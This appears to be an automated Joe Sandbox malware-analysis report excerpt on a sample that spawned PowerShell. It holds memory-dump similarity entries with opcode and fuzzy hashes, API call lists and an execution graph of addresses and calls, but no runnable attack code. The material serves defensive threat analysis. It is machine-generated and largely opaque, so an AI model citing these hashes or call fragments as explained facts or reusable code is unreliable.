                                                                                                              • Opcode Fuzzy Hash: ccf22da0147750aef5dc2870aa310f6cc427e2b221e0b1b15f399e3b2fc4dc88
                                                                                                              • Instruction Fuzzy Hash: 42F09612908F8881D602CF2CE8401ABB374FF4D78AF245326EF8C3A165DF29D5438700
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscatwcscpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 468205783-0
                                                                                                              • Opcode ID: 47e39745b95e65a02d31816b4517486cd1994e8b7a1a594a32fe267b5ff7099a
                                                                                                              • Instruction ID: 74ccb44f62290e134c2008bf6d1a11a01a39b7af20641f369d3a3fbb0a606fdd
                                                                                                              • Opcode Fuzzy Hash: 47e39745b95e65a02d31816b4517486cd1994e8b7a1a594a32fe267b5ff7099a
                                                                                                              • Instruction Fuzzy Hash: D321E422A1978545EB61DF26EC9436AB6A0FB59B84F188135EE8D873D6EF7CD040C342
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1456147049.00007FF624AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF624AC0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1456127992.00007FF624AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456162661.00007FF624ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456178237.00007FF624ACE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456487849.00007FF624CC6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456520658.00007FF624CC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456546985.00007FF624CCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456571535.00007FF624CCF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1456591995.00007FF624CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff624ac0000_ahlntQUj2t.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeavefree
                                                                                                              • String ID:
                                                                                                              • API String ID: 4020351045-0
                                                                                                              • Opcode ID: 3c65b183f754d1041ed0acf16b5e25c78a91340a247a1aeea4f14a11320141cc
                                                                                                              • Instruction ID: 2818a92a99096cac845ccf130164c6284b6b1987ba152018e420ed5ca6c4262a
                                                                                                              • Opcode Fuzzy Hash: 3c65b183f754d1041ed0acf16b5e25c78a91340a247a1aeea4f14a11320141cc
                                                                                                              • Instruction Fuzzy Hash: DE110975F1861686EF94CBA9ECD013923A4AFA4B40B644476D51DC32EAEF2CE945A302
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450954317.00007FFAAB4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab4e0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c9148667cee8ff279ee37562e40e765d4c9c13d7b0f9c8bcd68e5572000c5091
                                                                                                              • Instruction ID: af1b21cfcee957df534a97e337baac491c2dc54e5bfee114f0ed4869d8f985fa
                                                                                                              • Opcode Fuzzy Hash: c9148667cee8ff279ee37562e40e765d4c9c13d7b0f9c8bcd68e5572000c5091
                                                                                                              • Instruction Fuzzy Hash: 42A16A6290EBCA8FE3A9976848565B57FD1EF57394B0840FBD09DC72E3DA086C0983C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450954317.00007FFAAB4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab4e0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b8287900ade7cc37485c24a6679975571f7a92907f120674482f9c12fc74739e
                                                                                                              • Instruction ID: 9508512f86d9335cbb597b0349f2179cb8bb460ca79c65da27b98df1efaae4da
                                                                                                              • Opcode Fuzzy Hash: b8287900ade7cc37485c24a6679975571f7a92907f120674482f9c12fc74739e
                                                                                                              • Instruction Fuzzy Hash: 6E817772A0EB894FE795972C58146B07BE2EFA7250F0841FBD04DC71E3EA199C4983C6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450542587.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab410000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c8e3e67e6bbd363731b90b50bd58fcb921fccbb8594a4b5eb483a63449bc05d9
                                                                                                              • Instruction ID: 08aeab30dad2999bcecd4b71940388232d056a335b03d8e66dcc5d272860f2c0
                                                                                                              • Opcode Fuzzy Hash: c8e3e67e6bbd363731b90b50bd58fcb921fccbb8594a4b5eb483a63449bc05d9
                                                                                                              • Instruction Fuzzy Hash: 5041F97190DBC88FE7599B5C9C0A5B9BFF1EB56310F0441AFE498C31A3DA20A94987C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1449935345.00007FFAAB2FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2FD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab2fd000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d851fdb55c0fbd5216063b134caad0d8470c1202b97a883820d21b30aa37d0d6
                                                                                                              • Instruction ID: c4079b9ba7759f70de8175148b7c50a88447dc6c2521f6e22b614b504f924c05
                                                                                                              • Opcode Fuzzy Hash: d851fdb55c0fbd5216063b134caad0d8470c1202b97a883820d21b30aa37d0d6
                                                                                                              • Instruction Fuzzy Hash: B041147140EBC48FE7579B3898459523FF0EF57260F1905EFE088CB1A7D625A84ACB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450954317.00007FFAAB4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab4e0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ee3e57058213cbeae8072bbcf4abf85522b6c8123c74c9fdefe02619bb227ca
                                                                                                              • Instruction ID: 79aa2c960f81bfd4969b56bd7534efbe27379e079dbbb67088c19e69d3b492c3
                                                                                                              • Opcode Fuzzy Hash: 3ee3e57058213cbeae8072bbcf4abf85522b6c8123c74c9fdefe02619bb227ca
                                                                                                              • Instruction Fuzzy Hash: 2B31EC6290FAC78FF769936848522F86ED1EF56294B1844BAD09DC32E3DE08984943C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450542587.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab410000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: da9bfd2b36f06658ed7627870c38f49ad44367745ac37d2768337dc19c42b008
                                                                                                              • Instruction ID: ea16adaa5cc15b3b4618ba1080a8daa11669abac7400f0df4106b9607d9c2552
                                                                                                              • Opcode Fuzzy Hash: da9bfd2b36f06658ed7627870c38f49ad44367745ac37d2768337dc19c42b008
                                                                                                              • Instruction Fuzzy Hash: EE213C3090CB4C8FDB58DF5C98467E97BE0EB56321F04416BD04CC7166DA745409CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450542587.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab410000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 820964eeb3cdce4789f842acc8649b11680fae976cd73cfbe6fbda98684f9ead
                                                                                                              • Instruction ID: 4679eadb26236add6cce9340b09cf4f36ff7e4f60893249d11c471398f0850bf
                                                                                                              • Opcode Fuzzy Hash: 820964eeb3cdce4789f842acc8649b11680fae976cd73cfbe6fbda98684f9ead
                                                                                                              • Instruction Fuzzy Hash: 7B31E87380978A8FE705EF6CE4E68E93BA0FF1522870801F7D04D8A0B3EE15544687C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450542587.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab410000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction ID: f9059ee8ab2ea031a8b492906cfd29571e8e97076c8c122bde3f73a188d79598
                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction Fuzzy Hash: 1401677115CB0C8FDB48EF0CE451AA5B7E0FB95364F10056DE58AC3661DB36E881CB45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450954317.00007FFAAB4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab4e0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bafa71903f39cb695b8171a56e5fecd4af8bc734b4aa642346918728e8e6056c
                                                                                                              • Instruction ID: 14fb7e6120c0b122dba423eeef4dc781faf3dceec68ac2b7093f78d1a7851b36
                                                                                                              • Opcode Fuzzy Hash: bafa71903f39cb695b8171a56e5fecd4af8bc734b4aa642346918728e8e6056c
                                                                                                              • Instruction Fuzzy Hash: 0DF05E32A4D6458FD668EB5CE4518E877E1EF46360B1441F6E04DC7173CE29EC45C785
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450954317.00007FFAAB4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab4e0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3550ccf439f5f470acd408071cf9e3933c56b98ce2e40298206a3f3260bbe45d
                                                                                                              • Instruction ID: 1c8d8f92369f02d572cd2fd9815dfc4094b2076ba43e558ed8aad14e23207e32
                                                                                                              • Opcode Fuzzy Hash: 3550ccf439f5f470acd408071cf9e3933c56b98ce2e40298206a3f3260bbe45d
                                                                                                              • Instruction Fuzzy Hash: ABF05832A1DA448FD6A8EB4CE4818E877E1FF4636071441AAE04DC7573CA25EC458B85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450954317.00007FFAAB4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab4e0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4b18ea2d134abf75ccb74a54a47308710884cea2a0ee31d720b581f0250b6db6
                                                                                                              • Instruction ID: a89cb2d2455a85526ad7dc587181b338941a175ff5addbfb357aee7746b1cc3a
                                                                                                              • Opcode Fuzzy Hash: 4b18ea2d134abf75ccb74a54a47308710884cea2a0ee31d720b581f0250b6db6
                                                                                                              • Instruction Fuzzy Hash: 5BF05E32A0D6558FE754EB5CE4429E877E0FF4632171500F6E04DCB473DA29AC44C794
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450542587.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab410000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                              • API String ID: 0-2396788759
                                                                                                              • Opcode ID: bf42e9cd9c4bc394301d3776d8199805ecf4c8deb09fe6e5138367c71e807145
                                                                                                              • Instruction ID: 88b7ec471517cee31cd11696fbb405f8c746ca30a2a9460d03d81022c6d796c9
                                                                                                              • Opcode Fuzzy Hash: bf42e9cd9c4bc394301d3776d8199805ecf4c8deb09fe6e5138367c71e807145
                                                                                                              • Instruction Fuzzy Hash: 5B4132A3D8EAD2DBF255531D686D1A4BFD0EF62394B4D41F6C09D870B2FD1A281A41C2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450542587.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab410000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                              • API String ID: 0-2396788759
                                                                                                              • Opcode ID: f4620375d3e833f8527d8001b90780117b7842f743f2b214ba337b68bbf7825a
                                                                                                              • Instruction ID: 816b6d0ca4af033af9153d73330de387f8b4c0371c3e0a6e0a834137591fb669
                                                                                                              • Opcode Fuzzy Hash: f4620375d3e833f8527d8001b90780117b7842f743f2b214ba337b68bbf7825a
                                                                                                              • Instruction Fuzzy Hash: 59315BA2D8EAD3DBF25A43196869169FF90FF22384B4D81F6C09C470B2FD19281A45C2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450542587.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab410000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (0L$8,L$p0L$/L
                                                                                                              • API String ID: 0-3220053280
                                                                                                              • Opcode ID: 9406d2c22dbdae80caa8ac3a3823204eacdc4e491bfccfb482c3c71a3d8234fa
                                                                                                              • Instruction ID: 8a5910368340cf1230ce336f17bbb9e9b47b115fb048fd5ccb7b538f775eb2bb
                                                                                                              • Opcode Fuzzy Hash: 9406d2c22dbdae80caa8ac3a3823204eacdc4e491bfccfb482c3c71a3d8234fa
                                                                                                              • Instruction Fuzzy Hash: CF316083C8F6C18FF26557AC2C195656E95EFA3290B1880BFD0DC466FBD8489D0D83E5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1450542587.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_7ffaab410000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (0L$8,L$p0L$/L
                                                                                                              • API String ID: 0-3220053280
                                                                                                              • Opcode ID: 365fd05426534ce374caa555bb30a94abb56999a507846f4ad73c80a0b9e4302
                                                                                                              • Instruction ID: b5afe81510031972de2d4ff313ce581d889841818351e4a44c83c929bdb37ace
                                                                                                              • Opcode Fuzzy Hash: 365fd05426534ce374caa555bb30a94abb56999a507846f4ad73c80a0b9e4302
                                                                                                              • Instruction Fuzzy Hash: 692153C7C8F7C14FF26986A82C1A5A51E55EBA3650B1880FFE0D8466FB94949D0D83E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1592282384.00007FFAAB4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_7ffaab4f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35a29425327ba5a7834ccf038e531be3299d0d4034bd4b33191e3d4370f55c15
                                                                                                              • Instruction ID: e37636857b1f1205df173f9c1dcdf4a846c13bc93cf253ac45cb62ffc866033a
                                                                                                              • Opcode Fuzzy Hash: 35a29425327ba5a7834ccf038e531be3299d0d4034bd4b33191e3d4370f55c15
                                                                                                              • Instruction Fuzzy Hash: CBE14C62A0E7C68FE7A69B7848545B57FE1DF97690B0841FBD08DC72E3D9089C0A83D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1592282384.00007FFAAB4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_7ffaab4f0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08634eafa70fee1802f7472839606047f5a293d94c0b37b5c7896e3e82ac00fb
                                                                                                              • Instruction ID: 6fc89378d3ccdd70b56af03d8ea705baf9752b5deeaec95e1dd202d9cbd9c3d2
                                                                                                              • Opcode Fuzzy Hash: 08634eafa70fee1802f7472839606047f5a293d94c0b37b5c7896e3e82ac00fb
                                                                                                              • Instruction Fuzzy Hash: AC31D66290FBC78FF7A99B7848512786EC2EF966D4B1844BAD18DC32E3CC089C4943C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1591155496.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_7ffaab420000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                              • Instruction ID: 4d1373ae2515060758ec05591429ff86e4e2ed9c37008c95d37c158cfd2ad178
                                                                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                              • Instruction Fuzzy Hash: 8501677111CB0C8FD748EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E881CB45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1591155496.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_7ffaab420000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 13d937e13a62325fddd0b9d3061571f7ab6678e2fe7e173b73759a89c1dc740c
                                                                                                              • Instruction ID: 91998419a41e83ee476d63dfabae8c63239ec89d0afbff271663600ac3932906
                                                                                                              • Opcode Fuzzy Hash: 13d937e13a62325fddd0b9d3061571f7ab6678e2fe7e173b73759a89c1dc740c
                                                                                                              • Instruction Fuzzy Hash: AD312E5BA0F7A68BD701F77CF8A28E63B94EF5237670C46F7D2C986093DD05504A8292
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1591155496.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_7ffaab420000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (0L$8,L$H1L$P/L$p0L$-L$/L
                                                                                                              • API String ID: 0-713134170
                                                                                                              • Opcode ID: c3238a4ccc16285115c629345c0a855cfa1914335a1f6e369d80ebfb265574f2
                                                                                                              • Instruction ID: 97bd897622a5a8238e2168155186ba57dc897fe162ef59a09ae0754545ea1fe7
                                                                                                              • Opcode Fuzzy Hash: c3238a4ccc16285115c629345c0a855cfa1914335a1f6e369d80ebfb265574f2
                                                                                                              • Instruction Fuzzy Hash: 5B21718B40EBC14FF7998B981C151665FD5EF67384B0880EFE0C8466EBA9949D0C93C1

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:17.2%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:536
                                                                                                              Total number of Limit Nodes:12
                                                                                                              execution_graph 3877 7ff72347856e 3878 7ff723476900 2 API calls 3877->3878 3879 7ff72347858b 3878->3879 3879->3879 4076 7ff7234780ee 4077 7ff7234785a7 4076->4077 4081 7ff7234780e4 4076->4081 4079 7ff723476900 2 API calls 4077->4079 4078 7ff723476650 8 API calls 4078->4081 4080 7ff7234785c8 4079->4080 4081->4076 4081->4078 3697 7ff723475cec 3698 7ff723475cf8 _assert 3697->3698 3699 7ff723475d11 calloc 3697->3699 3698->3699 3700 7ff723475d28 TlsGetValue TlsSetValue 3699->3700 3701 7ff723475d60 3699->3701 4082 7ff7234781e8 4083 7ff7234781f4 4082->4083 4084 7ff72347821c 4083->4084 4085 7ff7234788ef wcslen 4083->4085 4086 7ff723476900 2 API calls 4084->4086 4087 7ff723478234 4086->4087 3880 7ff72347a570 3881 7ff72347a585 3880->3881 3882 7ff72347a590 DeleteCriticalSection 3880->3882 4088 7ff7234785f0 4089 7ff7234785f9 4088->4089 4090 7ff723478888 4088->4090 4091 7ff723478876 4089->4091 4092 7ff723476900 2 API calls 4089->4092 4093 7ff723478623 4092->4093 4094 7ff723478df0 4095 7ff723478df9 4094->4095 4096 7ff72347a5c0 6 API calls 4095->4096 4097 7ff723478e0e 4096->4097 4098 7ff723478d40 4097->4098 4104 7ff723478eaf 4097->4104 4099 7ff72347a6c0 5 API calls 4098->4099 4100 7ff723478d48 4099->4100 4101 7ff723478ab0 6 API calls 4100->4101 4116 7ff723478d70 4101->4116 4102 7ff7234792b9 4103 7ff723478a80 6 API calls 4125 7ff7234790bf 4103->4125 4104->4102 4105 7ff7234792d1 4104->4105 4106 7ff723479080 4104->4106 4104->4125 4105->4103 4105->4125 4126 7ff723478a80 4106->4126 4108 7ff72347a6c0 5 API calls 4112 7ff723479584 4108->4112 4109 7ff7234797c0 4110 7ff72347a7f0 6 API calls 4110->4125 4111 7ff723479270 4113 7ff72347a6c0 5 API calls 4111->4113 4112->4111 4115 7ff72347a6c0 5 API calls 4112->4115 4113->4116 4114 7ff72347953d 4114->4108 4114->4109 4115->4111 4117 7ff72347a950 10 API calls 4117->4125 4118 7ff723479521 4118->4109 4130 7ff72347a730 4118->4130 4120 7ff72347a6c0 Sleep InitializeCriticalSection InitializeCriticalSection EnterCriticalSection LeaveCriticalSection 4120->4125 4121 7ff72347a5c0 6 API calls 4122 7ff72347a056 memcpy 4121->4122 4122->4125 4124 7ff72347a730 8 API calls 4124->4125 4125->4109 4125->4110 4125->4111 4125->4114 4125->4117 4125->4118 4125->4120 4125->4121 4125->4124 4137 7ff72347ac10 4125->4137 4127 7ff723478a8c 4126->4127 4128 7ff72347a5c0 6 API calls 4127->4128 4129 7ff723478aa4 4128->4129 4129->4125 4132 7ff72347a750 4130->4132 4131 7ff72347a77b 4131->4114 4132->4131 4133 7ff72347a5c0 6 API calls 4132->4133 4134 7ff72347a7ab 4133->4134 4134->4131 4135 7ff72347a7b3 memcpy 4134->4135 4136 7ff72347a6c0 5 API calls 4135->4136 4136->4131 4138 7ff72347ac2d 4137->4138 4139 7ff72347ac5b 4137->4139 4138->4139 4141 7ff72347ad60 4138->4141 4140 7ff72347a5c0 6 API calls 4139->4140 4143 7ff72347ac69 4140->4143 4142 7ff72347a5c0 6 API calls 4141->4142 4142->4143 4143->4125 4143->4143 4144 7ff72347b3f0 ___mb_cur_max_func ___lc_codepage_func 4145 7ff72347b100 4 API calls 4144->4145 4146 7ff72347b43d 4145->4146 3883 7ff723474e70 3884 7ff723474e8f 3883->3884 3885 7ff723474ec6 fprintf 3884->3885 4147 7ff7234753db 4148 7ff7234753e9 4147->4148 4150 7ff7234752a3 4147->4150 4149 7ff723475222 4150->4149 4151 7ff7234753b2 VirtualProtect 4150->4151 4151->4150 3886 7ff72347b558 wcscat 3887 7ff72367c41c 3886->3887 4152 7ff72347b2e0 ___lc_codepage_func ___mb_cur_max_func 4153 7ff72347b321 4152->4153 4154 7ff72347b339 4152->4154 4153->4154 4155 7ff72347b332 4153->4155 4158 7ff72347b3a0 4153->4158 4155->4154 4157 7ff72347b100 4 API calls 4155->4157 4156 7ff72347b100 4 API calls 4156->4158 4157->4155 4158->4154 4158->4156 3755 7ff723471560 3765 7ff723473b60 3755->3765 3757 7ff72347157f 3758 7ff723471598 memset 3757->3758 3759 7ff723471583 3757->3759 3760 7ff7234715dc 3758->3760 3761 7ff7234716e1 _wgetenv 3760->3761 3762 7ff7234716f8 3761->3762 3768 7ff723474780 3762->3768 3764 7ff72347171f 3766 7ff723473b77 memset 3765->3766 3767 7ff723473ba0 3765->3767 3766->3767 3767->3757 3775 7ff723474430 3768->3775 3770 7ff7234747a3 3774 7ff7234747b0 3770->3774 3778 7ff723472d40 3770->3778 3772 7ff7234747f3 3772->3774 3791 7ff723474660 3772->3791 3774->3764 3797 7ff723473fa0 3775->3797 3777 7ff723474446 3777->3770 3782 7ff723472d56 3778->3782 3779 7ff723472e2e memset 3783 7ff723472e75 3779->3783 3780 7ff723472df5 3780->3779 3781 7ff723473328 3787 7ff72347338e 3781->3787 3788 7ff723472f1e memset wcscpy wcslen 3781->3788 3782->3780 3785 7ff7234734ae wcsncmp 3782->3785 3783->3781 3784 7ff723472ebb wcslen 3783->3784 3784->3781 3786 7ff723472ecf memset wcscpy wcslen 3784->3786 3785->3780 3785->3782 3786->3787 3786->3788 3789 7ff723472f52 wcslen wcslen wcslen 3787->3789 3788->3789 3790 7ff723473010 3789->3790 3790->3772 3792 7ff723474674 3791->3792 3803 7ff7234745a0 memset 3792->3803 3794 7ff7234746a1 3796 7ff7234746a5 3794->3796 3805 7ff723474610 memset 3794->3805 3796->3774 3800 7ff723473cc0 memset 3797->3800 3799 7ff723473fd2 3799->3777 3801 7ff723473d0f 3800->3801 3802 7ff723473d71 wcscpy wcscat wcslen 3801->3802 3802->3799 3804 7ff7234745d9 3803->3804 3804->3794 3806 7ff723474647 3805->3806 3806->3796 3888 7ff723473c60 wcscpy wcslen 3889 7ff723473c8d 3888->3889 4159 7ff723473de0 4160 7ff723473cc0 4 API calls 4159->4160 4161 7ff723473e12 4160->4161 4165 7ff723474de0 4166 7ff723474df2 4165->4166 4167 7ff723474e02 4166->4167 4170 7ff723475940 4166->4170 4169 7ff723474e47 4171 7ff72347594e 4170->4171 4172 7ff7234759e5 4170->4172 4175 7ff723475952 4171->4175 4176 7ff7234759c1 DeleteCriticalSection 4171->4176 4177 7ff7234759b0 free 4171->4177 4173 7ff7234759ef 4172->4173 